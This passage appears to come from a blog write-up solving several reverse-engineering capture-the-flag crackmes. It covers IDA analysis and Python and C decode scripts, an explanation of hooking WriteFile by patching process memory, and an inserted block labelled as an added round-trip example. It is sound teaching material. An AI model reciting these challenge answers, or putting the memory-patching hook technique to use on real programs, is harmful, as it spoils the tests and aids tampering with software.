class="number">3</span>):</span><br><span class="line"> flag+=chr((<span class="number">18</span>^enflag[i])<span class="number">-6</span>)</span><br><span class="line"> flag+=chr((<span class="number">18</span>^enflag[i+<span class="number">1</span>])+<span class="number">6</span>)</span><br><span class="line"> flag+=chr(<span class="number">18</span>^enflag[i+<span class="number">2</span>]^<span class="number">6</span>) </span><br><span class="line"> </span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><h3 id="ReverseMe-120"><a href="#ReverseMe-120" class="headerlink" title="ReverseMe-120"></a>ReverseMe-120</h3><p>Open it in IDA and first look at the program logic.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/JCQVIn2gzx43PST.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The success condition is <code>v9</code>, and <code>v9</code> is the result of comparing <code>v13</code> with the string "<code>you_know_how_to_remove_junk_code</code>". So trace the data flow of <code>v13</code> to see where it comes from.</p><p>We can see the definition of <code>v13</code> and a key function <code>sub_401000</code>. It is the key function because its arguments include the <strong>just-defined</strong> <code>v13</code> and <strong>your input</strong> <code>v11</code>.</p><p>Step into it. Keep in mind that what we want to know is how <code>v13</code> is produced; <code>v13</code> is the <strong>second argument</strong>, so inside <code>sub_401000</code> it is <code>a2</code>, and we follow <code>a2</code>.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/veyU4frF1wlQ8Nq.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It turns out to be base64. Reference notes:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/D7SrYZMOXL1J6fl.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Write the decryption script:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 
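contenteditable="true"></div><p>The 666 and ReverseMe-120 challenges share one workflow: read the encoder out of the decompiler, invert it, and confirm the inverse by feeding the recovered input back through the forward direction. The block below is an added example, not code from the original post, and it covers both sections: for 666 it rebuilds encode() as the inverse of the three per-group steps in the solve scripts (key 18, then +6 / -6 / ^6), and for ReverseMe-120 it models sub_401000 as base64-decode followed by XOR 0x25, which is the direction the XOR-then-base64 solve script implies. The constants enflag, key, the target string and 0x25 come from the post; the function names and the exact encoder directions are my assumptions.</p>

```python
# Added example (not from the original post): encoder/decoder pairs for
# "666" and "ReverseMe-120", each confirmed by a round trip.
import base64

# --- 666 ---------------------------------------------------------------
KEY_666 = 18                          # key: XOR constant and required length
ENFLAG_666 = b'izwhroz""w"v.K".Ni'    # enflag from the post (18 bytes)


def encode_666(flag):
    """encode(): per 3-byte group, the inverse of the solve script's steps
    (assumption derived from the decoder: (c+6)^18, (c-6)^18, c^18^6)."""
    if len(flag) != KEY_666:
        raise ValueError("input length must equal key (18)")
    out = bytearray(KEY_666)
    for i in range(0, KEY_666, 3):
        out[i] = ((flag[i] + 6) & 0xFF) ^ KEY_666
        out[i + 1] = ((flag[i + 1] - 6) & 0xFF) ^ KEY_666
        out[i + 2] = flag[i + 2] ^ KEY_666 ^ 6
    return bytes(out)


def decode_666(enc):
    """Decoder, the same three steps as the post's C and Python scripts."""
    if len(enc) != KEY_666:
        raise ValueError("ciphertext length must equal key (18)")
    out = bytearray(KEY_666)
    for i in range(0, KEY_666, 3):
        out[i] = ((enc[i] ^ KEY_666) - 6) & 0xFF
        out[i + 1] = ((enc[i + 1] ^ KEY_666) + 6) & 0xFF
        out[i + 2] = (enc[i + 2] ^ KEY_666) ^ 6
    return bytes(out)


# --- ReverseMe-120 -----------------------------------------------------
XOR_120 = 0x25
TARGET_120 = b'you_know_how_to_remove_junk_code'   # compared with v13 (from the post)


def check_120(user_input):
    """Model of sub_401000 (assumption): base64-decode the input and XOR each
    byte with 0x25; main compares the result with TARGET_120."""
    raw = base64.b64decode(user_input, validate=True)
    return bytes(b ^ XOR_120 for b in raw)


def solve_120():
    """Input that makes check_120() yield TARGET_120: XOR first, then base64."""
    return base64.b64encode(bytes(b ^ XOR_120 for b in TARGET_120))


if __name__ == '__main__':
    flag_666 = decode_666(ENFLAG_666)
    assert encode_666(flag_666) == ENFLAG_666      # round trip for 666
    assert check_120(solve_120()) == TARGET_120    # round trip for ReverseMe-120
    print(flag_666.decode(), solve_120().decode())
```

<p>Both round trips run in the block's main guard; the length checks in encode_666/decode_666 mirror the binary's own key comparison, so a wrong-length candidate fails loudly rather than being silently truncated.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 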
contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">s=<span class="string">'you_know_how_to_remove_junk_code'</span></span><br><span class="line">tmp=<span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(s)):</span><br><span class="line"> tmp+=chr(ord(s[i])^<span class="number">0x25</span>)</span><br><span class="line">print(base64.b64encode(tmp.encode(<span class="string">'utf-8'</span>)))</span><br></pre></td></tr></table></figure></div><h3 id="EASYHOOK"><a href="#EASYHOOK" class="headerlink" title="EASYHOOK"></a>EASYHOOK</h3><p>Open it in IDA and press F5 to decompile main:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/3feh4s7lUoCFDaH.png" alt="image-20201202163002260" title=""> </div> <div class="image-caption">image-20201202163002260</div> </figure><p>A rough read shows the input flag must be 19 characters long. Once the length check passes, sub_401220 is called first; its purpose is unknown at this point. Then CreateFileA and WriteFile write the input flag to a file; double-clicking FileName shows it is the file Your_Input in the current directory. Next sub_401240 is called with the addresses of buffer and NumberOfBytesWritten, and since a key comparison follows right after it, sub_401240 very likely is the function that validates the flag.</p><p>From the above, the 19-character input flag gets written to a file. Testing, however, shows that the flag written to the file has been altered. Looking back over main's control flow, the modification must happen either inside sub_401220 or inside WriteFile itself. Since the challenge name hints at hooking, the guess is that sub_401220 hooks WriteFile. Pressing F5 on sub_401220 fails with an error; reading the assembly confirms the guess. Analysis follows:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/j4fGlDYMrcKxwy5.png" alt="image-20201202163322284" title=""> </div> <div class="image-caption">image-20201202163322284</div> </figure><p>sub_401220 obtains the process handle and then jumps to loc_4011B0.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img 
src="https://i.loli.net/2020/12/02/NjAm48ZpobEuGUw.png" alt="image-20201202163345312" title=""> </div> <div class="image-caption">image-20201202163345312</div> </figure><p>In loc_401180 it fetches the address of WriteFile via GetProcAddress and then calls sub_4010D0. Note the values in the red boxes.</p><p>Decompiling sub_4010D0 with F5 shows it calls VirtualProtectEx and WriteProcessMemory to overwrite the first 5 bytes of WriteFile. Dynamic debugging reveals they are replaced with an unconditional jump to sub_401080, which is how WriteFile gets hooked.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/GAhwgMlzebICosc.png" alt="image-20201202163510734" title=""> </div> <div class="image-caption">image-20201202163510734</div> </figure><p>It first calls sub_401000; from the argument passing, lpBuffer is the flag we typed, so sub_401000 most likely is where the flag gets modified. It then calls sub_401140 and afterwards calls WriteFile once more. Even though WriteFile is hooked, the flag does end up written to the file, so sub_401140 most likely restores the original WriteFile (removes the hook). Finally the return value of sub_401000 is checked: if it is non-zero, NumberOfBytesWritten is set to 1.</p><p>Analyzing sub_401140 first confirms the hook removal. Then look at sub_401000, which consists mainly of two loops:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/02/KV5CirUT68yRdMJ.png" alt="image-20201202163602738" title=""> </div> <div class="image-caption">image-20201202163602738</div> </figure><p>The intent here is clearly a string comparison. Combined with the analysis above: after our 19-character flag passes through the first loop, if it equals the global string pointed to by byte_40A030, sub_401000 returns 1. sub_401080 checks that return value and sets NumberOfBytesWritten to 1 when it is 1. The outermost main then checks NumberOfBytesWritten and prints the success message when it is 1.</p><p>So all we need to do is apply the inverse of sub_401000's first loop to the string pointed to by byte_40A030 to recover the correct flag.</p><p>Don't forget sub_401240 in main: at the start we assumed it performed the key validation of the input flag, but the real validation function is sub_401000; it is enough for sub_401000's check to pass.</p><p>Scripts, implemented in both Python and C:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">data=[ 
 <span class="number">0x61</span>, <span class="number">0x6A</span>, <span class="number">0x79</span>, <span class="number">0x67</span>, <span class="number">0x6B</span>, <span class="number">0x46</span>, <span class="number">0x6D</span>, <span class="number">0x2E</span>, <span class="number">0x7F</span>, <span class="number">0x5F</span>,</span><br><span class="line"> <span class="number">0x7E</span>, <span class="number">0x2D</span>, <span class="number">0x53</span>, <span class="number">0x56</span>, <span class="number">0x7B</span>, <span class="number">0x38</span>, <span class="number">0x6D</span>, <span class="number">0x4C</span>, <span class="number">0x6E</span>, <span class="number">0x00</span>]</span><br><span class="line">data[<span class="number">18</span>]^=<span class="number">0x13</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">17</span>,<span class="number">-1</span>,<span class="number">-1</span>):</span><br><span class="line"> t=i^data[i]</span><br><span class="line"> <span class="keyword">if</span> i%<span class="number">2</span>:</span><br><span class="line"> data[i]=t+i</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> data[i+<span class="number">2</span>]=t</span><br><span class="line">print(<span class="string">''</span>.join(map(chr,data)))</span><br></pre></td></tr></table></figure></div><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><stdio.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* byte_40A030 from the binary (19 bytes plus terminator) */</span></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> str[] =</span><br><span class="line">{</span><br><span class="line"> <span class="number">0x61</span>, <span class="number">0x6A</span>, <span class="number">0x79</span>, <span class="number">0x67</span>, <span class="number">0x6B</span>, <span class="number">0x46</span>, <span class="number">0x6D</span>, <span class="number">0x2E</span>, <span class="number">0x7F</span>, <span class="number">0x5F</span>,</span><br><span class="line"> <span class="number">0x7E</span>, <span class="number">0x2D</span>, <span class="number">0x53</span>, <span class="number">0x56</span>, <span class="number">0x7B</span>, <span class="number">0x38</span>, <span class="number">0x6D</span>, <span class="number">0x4C</span>, <span class="number">0x6E</span>, <span class="number">0x00</span></span><br><span class="line">};</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> str[<span class="number">18</span>]^=<span class="number">0x13</span>u;</span><br><span class="line"> <span class="keyword">int</span> v3;</span><br><span class="line"> <span class="comment">/* inverse of the first loop in sub_401000, walked backwards */</span></span><br><span class="line"> <span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">17</span>;i>=<span class="number">0</span>;i--)</span><br><span class="line"> {</span><br><span class="line"> v3 = i ^ str[i];</span><br><span class="line"> <span class="keyword">if</span>(i%<span class="number">2</span>)</span><br><span class="line"> str[i] = v3 + i;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> str[i+<span class="number">2</span>] = v3;</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"%s\n"</span>,str);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h3 id="easyre-153"><a href="#easyre-153" class="headerlink" title="easyre-153"></a>easyre-153</h3><p>Inspection shows a 32-bit ELF file, packed:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/RNvTVMpK2c7GA1s.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Unpack it on Kali:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/UpCxYFDAqaenT5g.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Static analysis in IDA:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/mr7RLnhj29bX1xZ.png" alt="" title=""> </div> <div 
class="image-caption"></div> </figure><p>pipe creates a channel for communication between two processes; index 1 is the write end and index 0 the read end.</p><p>fork is the function that creates a "child process" through a system call.</p><p>fork returns 0 in the child and the child's process id in the parent.</p><p>So it is easy to see that in the child, because v5==0, the program prints the "OMG!!!! I forgot kid's id" we saw earlier and then sends 69800876143568214356928753 to the parent through the pipe.</p><p>After finishing that, the child calls exit(0).</p><p>In the parent, since v5!=0, it skips the part the child just executed, reads the digit string the child sent it, and reads the user input v6.</p><p>If v6==v5, it continues with the operations below.</p><p>In other words, the program creates a pipe and then spawns a child process for inter-process communication. The child sends <strong>69800876143568214356928753</strong> to the parent. The parent asks the user for an integer that must equal the child's <strong>pid</strong>. After that it decodes the received data into the <strong>flag</strong> and prints it.</p><p>Step into the lol function:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/c3TmMtUDf1J9nl5.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Now look at the control-flow graph:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/10/GUSC1HW9Laz3b5Z.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It turns out the author patched out the code that prints the decoded data, so it never executes. The decoding is not complicated, so just do it in a Python script.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">guo=<span class="string">'69800876143568214356928753'</span></span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">flag=chr(<span class="number">2</span>*ord(guo[<span class="number">1</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">4</span>])+ord(guo[<span class="number">5</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">8</span>])+ord(guo[<span class="number">9</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">12</span>])*<span class="number">2</span>)</span><br><span class="line">flag+=chr(ord(guo[<span class="number">17</span>])+ord(guo[<span 
class="number">18</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">10</span>])+ord(guo[<span class="number">21</span>]))</span><br><span class="line">flag+=chr(ord(guo[<span class="number">9</span>])+ord(guo[<span class="number">25</span>]))</span><br><span class="line"><span class="keyword">print</span> (<span class="string">'RCTF{'</span>+flag+<span class="string">'}'</span>)</span><br></pre></td></tr></table></figure></div><h3 id="IgniteMe"><a href="#IgniteMe" class="headerlink" title="IgniteMe"></a>IgniteMe</h3><p>32-bit file, not packed:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/BYfRjnq27HES6mM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Load it into IDA. The logic is not hard; I added plenty of comments to make the program easier to follow.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/lpaJNdFA5zstYbr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>There is one key function, sub_4011C0(), structured as follows:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/7DLn4SzqhsQbro3.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/17/qiUAf3dpWeG5cmO.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>EXP</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line">cipher=<span class="string">r'GONDPHyGjPEKruv{{pj]X@rF'</span></span><br><span class="line">k=[<span class="number">0xd</span>,<span class="number">0x13</span>,<span 
class="number">0x17</span>,<span class="number">0x11</span>,<span class="number">0x2</span>,<span class="number">0x1</span>,<span class="number">0x20</span>,<span class="number">0x1d</span>,<span class="number">0xc</span>,<span class="number">0x2</span>,<span class="number">0x19</span>,<span class="number">0x2f</span>,<span class="number">0x17</span>,<span class="number">0x2b</span>,<span class="number">0x24</span>,<span class="number">0x1f</span>,<span class="number">0x1e</span>,<span class="number">0x16</span>,<span class="number">0x9</span>,<span class="number">0xf</span>,<span class="number">0x15</span>,<span class="number">0x27</span>,<span class="number">0x13</span>,<span class="number">0x26</span>,<span class="number">0xa</span>,<span class="number">0x2f</span>,<span class="number">0x1e</span>,<span class="number">0x1a</span>,<span class="number">0x2d</span>,<span class="number">0xc</span>,<span class="number">0x22</span>,<span class="number">0x4</span>]</span><br><span class="line">ch=<span class="string">''</span></span><br><span class="line">flag=<span class="string">''</span></span><br><span class="line">i=<span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(cipher)):</span><br><span class="line"> <span class="keyword">for</span> c <span class="keyword">in</span> string.printable:</span><br><span class="line"> <span class="keyword">if</span> c>=<span class="string">'a'</span> <span class="keyword">and</span> c<=<span class="string">'z'</span>:</span><br><span class="line"> ch=chr(ord(c)<span class="number">-32</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> c>=<span class="string">'A'</span> <span class="keyword">and</span> c<=<span class="string">'Z'</span>:</span><br><span class="line"> ch=chr(ord(c)+<span class="number">32</span>)</span><br><span 
class="line"> <span class="keyword">else</span>:</span><br><span class="line"> ch=c</span><br><span class="line"> ch=chr(k[i]^((ord(ch)^<span class="number">0x55</span>)+<span class="number">72</span>))</span><br><span class="line"> <span class="keyword">if</span> ch==cipher[i]:</span><br><span class="line"> flag+=c</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> (<span class="string">'EIS{'</span>+flag+<span class="string">'}'</span>)</span><br></pre></td></tr></table></figure></div><p>Personally I still prefer writing C, so here is the C version as well:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">char</span> a[]={<span class="number">0x0D</span>, <span class="number">0x13</span>, <span class="number">0x17</span>, <span class="number">0x11</span>, <span class="number">0x2</span>, <span class="number">0x1</span>, <span class="number">0x20</span>, <span class="number">0x1D</span>, <span class="number">0x0C</span>, <span class="number">0x2</span>, <span class="number">0x19</span>, <span class="number">0x2F</span>, <span class="number">0x17</span>, <span class="number">0x2B</span>, <span class="number">0x24</span>, <span class="number">0x1F</span>, <span class="number">0x1E</span>, <span class="number">0x16</span>, <span class="number">0x9</span>, <span 
class="number">0x0F</span>, <span class="number">0x15</span>, <span class="number">0x27</span>, <span class="number">0x13</span>, <span class="number">0x26</span>, <span class="number">0x0A</span>, <span class="number">0x2F</span>, <span class="number">0x1E</span>, <span class="number">0x1A</span>, <span class="number">0x2D</span>, <span class="number">0x0C</span>, <span class="number">0x22</span>,<span class="number">0x4</span>};</span><br><span class="line"><span class="keyword">char</span> b[]=<span class="string">"GONDPHyGjPEKruv{{pj]X@rF"</span>;</span><br><span class="line"><span class="keyword">int</span> i;</span><br><span class="line"><span class="keyword">char</span> j;</span><br><span class="line"><span class="keyword">for</span>(i=<span class="number">0</span>;i<<span class="number">24</span>;i++)</span><br><span class="line">{</span><br><span class="line"><span class="comment">/* brute-force the (case-swapped) byte that encodes to b[i] */</span></span><br><span class="line"><span class="keyword">for</span>(j=<span class="number">0X0</span>;j<<span class="number">0X7f</span>;j++){</span><br><span class="line"><span class="keyword">if</span>(b[i]==(a[i]^((j^<span class="number">0x55</span>)+<span class="number">0x48</span>)))</span><br><span class="line">{</span><br><span class="line"><span class="comment">/* undo the case swap: A-Z back to a-z, a-z back to A-Z */</span></span><br><span class="line"><span class="keyword">if</span> (<span class="number">0x40</span><j&&j<<span class="number">0x5B</span>)</span><br><span class="line">j+=<span class="number">0x20</span>;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(<span class="number">0x60</span><j&&j<<span class="number">0x7B</span>)</span><br><span class="line">j-=<span class="number">0x20</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"%c"</span>,j);</span><br><span class="line"><span class="keyword">break</span>; <span class="comment">/* j was modified above; stop before it re-matches */</span></span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"\n"</span>);</span><br><span class="line"><span class="keyword">return</span> <span 
class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>One small IDA trick I learned here: <em>data can be extracted with the shortcut Shift+E in the Hex View window (so you don't have to type it in byte by byte like I did)</em>.</p><h3 id="reverse-for-the-holy-grail-350"><a href="#reverse-for-the-holy-grail-350" class="headerlink" title="reverse-for-the-holy-grail-350"></a>reverse-for-the-holy-grail-350</h3><p>A 64-bit ELF; load it into IDA for static analysis.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/22/XRnHwaFJ57M4bS9.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>The main function:</p><div class="highlight-wrap" data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> v3; <span class="comment">// ebx</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// ebx</span></span><br><span class="line"> __int64 v5; <span class="comment">// rbx</span></span><br><span class="line"> <span class="keyword">void</span> *v7; <span class="comment">// [rsp+0h] [rbp-70h]</span></span><br><span class="line"> __int64 v8; <span class="comment">// [rsp+10h] [rbp-60h]</span></span><br><span class="line"> <span class="keyword">void</span> *v9; <span class="comment">// [rsp+20h] [rbp-50h]</span></span><br><span class="line"> __int64 v10; <span class="comment">// [rsp+30h] [rbp-40h]</span></span><br><span class="line"> <span 
class="keyword">void</span> *v11; <span class="comment">// [rsp+40h] [rbp-30h]</span></span><br><span class="line"> __int64 v12; <span class="comment">// [rsp+48h] [rbp-28h]</span></span><br><span class="line"> <span class="keyword">char</span> v13; <span class="comment">// [rsp+50h] [rbp-20h]</span></span><br><span class="line"></span><br><span class="line"> v11 = &v13;</span><br><span class="line"> v12 = <span class="number">0L</span>L;</span><br><span class="line"> v13 = <span class="number">0</span>;</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"What... is your name?"</span>, <span class="number">21L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> <span class="built_in">std</span>::<span class="keyword">operator</span>>><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cin</span>, &v11);</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"What... 
is your quest?"</span>, <span class="number">22L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> <span class="built_in">std</span>::istream::ignore((<span class="built_in">std</span>::istream *)&<span class="built_in">std</span>::<span class="built_in">cin</span>);</span><br><span class="line"> <span class="built_in">std</span>::getline<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>((__int64)&<span class="built_in">std</span>::<span class="built_in">cin</span>, (__int64)&v11);</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"What... 
is the secret password?"</span>, <span class="number">32L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> <span class="built_in">std</span>::<span class="keyword">operator</span>>><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cin</span>, &userIn);</span><br><span class="line"> v7 = &v8;</span><br><span class="line"> <span class="built_in">std</span>::__cxx11::basic_string<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>::_M_construct<<span class="keyword">char</span> *>(</span><br><span class="line"> (__int64 *)&v7,</span><br><span class="line"> (_BYTE *)userIn,</span><br><span class="line"> (_BYTE *)(qword_601AE8 + userIn));</span><br><span class="line"> v3 = validChars((__int64 *)&v7);</span><br><span class="line"> <span class="keyword">if</span> ( v7 != &v8 )</span><br><span class="line"> <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v7)</span></span>;</span><br><span class="line"> <span class="keyword">if</span> ( v3 < <span class="number">0</span> )</span><br><span class="line"> <span class="keyword">goto</span> LABEL_14;</span><br><span class="line"> v9 = &v10;</span><br><span class="line"> <span class="built_in">std</span>::__cxx11::basic_string<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span 
class="keyword">char</span>>,<span class="built_in">std</span>::allocator<<span class="keyword">char</span>>>::_M_construct<<span class="keyword">char</span> *>(</span><br><span class="line"> (__int64 *)&v9,</span><br><span class="line"> (_BYTE *)userIn,</span><br><span class="line"> (_BYTE *)(qword_601AE8 + userIn));</span><br><span class="line"> v4 = stringMod((__int64 *)&v9); <span class="comment">// stringMod is the key to solving this challenge</span></span><br><span class="line"> <span class="keyword">if</span> ( v9 != &v10 ) <span class="comment">// this is the key function</span></span><br><span class="line"> <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v9)</span></span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 < <span class="number">0</span> )</span><br><span class="line"> {</span><br><span class="line">LABEL_14:</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Auuuuuuuugh"</span>, <span class="number">11L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, <span class="string">"Go on. Off you go. 
tuctf{"</span>, <span class="number">25L</span>L);</span><br><span class="line"> v5 = <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(&<span class="built_in">std</span>::<span class="built_in">cout</span>, userIn, qword_601AE8);</span><br><span class="line"> <span class="built_in">std</span>::__ostream_insert<<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(v5, <span class="string">"}"</span>, <span class="number">1L</span>L);</span><br><span class="line"> <span class="built_in">std</span>::<span class="built_in">endl</span><<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits<<span class="keyword">char</span>>>(v5);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> ( v11 != &v13 )</span><br><span class="line"> <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v11)</span></span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span 